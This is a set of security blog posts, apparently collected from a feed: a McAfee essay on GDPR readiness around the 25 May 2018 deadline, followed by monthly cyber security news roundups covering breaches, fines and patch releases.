The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day

At one point in my career, I was responsible for launching massive websites.  We’d talk about when and how we flip the switch to launch the new website.  At least once during every project someone would ask me who got to flip the switch, as though we would have a dignitary (or them?) do it.  But depending on the year, the flipping on of a website was handled through technology and not very dramatic and not with the fanfare the non-technologists hoped for. (Dimming lights? Fireworks?  It was New York and it was publishing, so there was often beer and wine and maybe T-shirts after, but everyone went home and slept.)

And now we have May 25th coming around the corner. The other day, I got a picture in a text from a colleague of a can of sardines.  It took me a minute to realize the expiration was May 25.  So, other than the sardines, what happens?  Are we done?

First the bad news:  We won’t ever be done.  GDPR requires constant diligence for its principles, recurring reviews of the processes we’ve built; ongoing use of Data Processing Impact Assessments; vigilance on how we process, store, transfer, use personal data; communications with our customers; new contractual language and new things to negotiate; ongoing discussions around security and what is appropriate.  And of course, the biggest question: What will the data regulators do?  Will there be an immediate fine? (My bet is no.)

But now the good news: If you’ve been doing this right and have managed to focus on the concepts of Great Data Protection Rocks and a culture of security, the following things may have happened:

  • You have a much better idea of what data you have, where it is stored, who can get to it, and how it gets used. Hopefully you have deleted some data and have additional automated processes to delete data when it ceases to be needed.
  • You have processes in place to replace things that were being done on the fly. Maybe there’s some documentation and someone officially designated to help with the processes.
  • You know who your vendors are, and more about your high-risk and cloud vendors.
  • You have determined what needs securing and made sure you are securing it “appropriately.”
  • You’ve got a team of people who understand data protection and GDPR – maybe some new friends and some new project partners. A few of them may not have bought in completely (the people who were “voluntold” to help), but just wait.  Something often  seems to happen in the doubter’s personal life that makes them get it – and big time.  Real examples:  Mortgage application reveals massive identity theft that needs to be fixed or they lose the house; soccer coach sends kid’s medical condition info to the whole team’s parents; intern (not at McAfee!) sends spreadsheet of fraternity members’ contact info, but it also contained everyone’s grade-point average.

Perhaps most importantly, your company now has momentum around doing the right thing regarding data protection.  And May 25th will come – too soon, not soon enough, or both! – and the lights won’t dim but there might be T-shirts.

It would be easy to forget GDPR’s lessons. In the United States, Monday, May 28th, is Memorial Day, and we pull out summer clothes, take off to mark the start of summer, and remember our heroes.  But on that Monday and Tuesday and every day after, Great Data Protection will still Rock, and we will still need to look at data, how it’s used, and how our culture can protect it. Just maybe throw out the sardines if they don’t get eaten beforehand (or leave them on the doubter’s desk as a joke).

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only and it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit promise or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

The post The Tortoise and The Hare Part II: May 25th is a Friday, or Great Data Protection Rocks even after Memorial Day appeared first on McAfee Blogs.

How prepared is your business for the GDPR?

The GDPR is the biggest privacy shakeup since the dawn of the internet and it is just weeks before it comes into force on 25th May. GDPR comes with potentially head-spinning financial penalties for businesses found not complying, so it really is essential for any business which touches EU citizen's personal data, to thoroughly do their privacy rights homework and properly prepare.

Sage have produced a nice GDPR infographic which breaks down the basics of the GDPR with tips on complying, which is shared below.

I am currently writing a comprehensive GDPR Application Developer's Guidance series for IBM developerWorks, which will be released in the coming weeks.

The GDPR: A guide for international business - A Sage Infographic

Cyber Security Roundup for February 2018

February saw over 5,000 websites infected by cryptocurrency mining malware after a popular accessibility plugin called ‘BrowseAloud’ was compromised by hackers. This led to several UK Government and Councils websites going offline, including the Information Commissioner's Office, the Student Loans Company, and Manchester City, Camden and Croydon Council website. Symantec Researchers also announced that 'Crytojacking' attacks had increased 1,200% in the UK. Cryptojacking once involved the installation of cryptocurrency mining malware on users computers, but now it is more frequently used in-browser, by hacking a website and execute a malicious mining JavaScript as the user visits the compromised website, as with the case with the 'BrowseAloud' incident.

More than 25% of UK Councils are said to have suffered a breach in the last five years according to the privacy group Big Brother Watch, who said UK Councils are unprepared for Cyber Attacks.

There was a  fascinating report released about Artificial Intelligence (AI) Threat, written by 26 leading AI experts, the report forecasts the various malicious usages for AI, including with cybercrime, and manipulation of social media and national news media agendas.

GDPR preparation or panic, depending on your position, is gaining momentum with less than 100 days before the privacy regulation comes into force in late May. Here are some of the latest GDPR articles of note.

Digital Guardian released an interactive article where you can attempt to guess the value of various types of stolen data to cybercriminals -.Digital Guardian: Do you know your data's worth?

Bestvpns released a comprehensive infographic covering the 77 Facts About Cyber Crime we should all know about in 2018.

February was yet another frantic month for security updates, which saw Microsoft release over 50 patches, and there were new critical security updates by Adobe, Apple, Cisco, Dell, and Drupal.


GDPR Material and Territorial Scopes

The new EU General Data Regulation will enter into force 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

GDPR Preparation: Recent Articles of Note

Company preparations for GDPR compliance are (or should be!) in full swing with the 25th May enforcement date fast looming on the horizon. With that in mind, I found the following set of recent GDPR articles a decent and interesting read. The list was compiled by Brian Pennington of Coalfire, he has kindly allowed me to repost.

If you are after further GDPR swatting up, you could always read the actual regulation EU General Data Protection Regulation (EU-GDPR), and don't forget to read all the Recitilies.

If you have any offer GDPR related articles or blogs of note, please post in the comments.

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.




Cyber Security Roundup for November 2017

One of the most notable data breaches disclosed this month was by Uber, given the company attempted to cover up the breach by paying off hackers. Over a year ago the transport tech firm was said to have paid £75,000 to two hackers to delete 57 million Uber account records which they had stolen. Uber revealed around 2.7 million of the stolen records were British riders and drivers. As a UK Uber rider, this could mean me, I haven't received any notification of the data breach from Uber as yet. The stolen information included names, email addresses, and phone numbers. Uber can expect enforcement action from regulators on both sides of the pond, the UK Information Commissioner's Office (ICO) said it had "huge concerns" about the breach and was investigating.

Jewson, Cash Converters, and Imgur all reported losing data due to hacks this month, while Equifax has reported suffering significant negative financial losses following their high profile hack of personal customer data. Equifax reported their net income had dropped by £20 million due to the hack, and their breach bill was coming in at a whopping £67 million.

November was a very busy month for security patches releases, with Microsoft, Apple, Adobe, Oracle, Cisco and Intel releasing a raft of patches to fix critical vulnerabilities. Apple even had to quickly release an emergency patch at end of November to fix a root access flaw reported in macOS High Sierra version 10.13.1. So just keep patching everything IT to ensure you and your business stays ahead of enterprising cybercriminals, the Equifax breach is a prime example of what can go wrong if system patching is neglected.

November also saw Open Web Application Security Project (OWASP) finally released an updated version to its Top Ten application vulnerabilities list, which is a ‘must know’ secure coding best practice for all software developers and security testers, especially considering that Akamai reported web application attacks had increased by 69% in the third quarter of 2017. Look out for an updated OWASP Top Ten IBM DeveloperWorks Guidance from me in December to reflect the updated list.